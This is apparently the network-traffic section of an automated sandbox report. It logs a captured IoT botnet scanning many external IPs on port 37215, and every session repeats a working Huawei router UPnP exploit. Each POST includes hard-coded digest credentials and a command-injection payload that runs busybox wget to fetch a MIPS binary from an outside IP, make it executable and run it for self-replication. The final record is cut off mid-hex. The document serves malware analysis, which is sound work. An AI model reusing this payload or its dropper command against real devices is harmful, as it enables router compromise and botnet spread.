                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  282192.168.2.135398490.0.89.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.097738981 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  283192.168.2.1348582197.223.117.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.097767115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  284192.168.2.1335902157.57.71.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.097784996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  285192.168.2.1348508193.225.105.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.097800970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  286192.168.2.134355841.7.228.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.097803116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  287192.168.2.135114641.185.190.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.097827911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  288192.168.2.1348896157.99.212.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098081112 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  289192.168.2.1338088219.230.154.18437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098082066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  290192.168.2.135924241.215.199.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098083019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  291192.168.2.134519212.38.75.537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098102093 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 